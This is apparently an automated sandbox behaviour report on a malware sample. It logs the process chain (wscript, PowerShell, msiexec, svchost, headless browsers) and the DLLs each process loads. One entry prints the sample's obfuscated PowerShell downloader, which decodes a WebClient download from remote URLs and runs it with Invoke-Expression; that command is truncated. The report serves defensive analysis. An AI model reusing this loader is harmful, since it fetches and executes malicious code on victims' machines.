                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\ilurgw960k7fwnm.xlsx"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr65F9.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/20442955"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6EA4.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/a1d56f56"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2240,i,1470549389537924356,18333777287328738215,262144 /prefetch:8
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,15536600320984337439,5913391626331834,262144 /prefetch:3
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
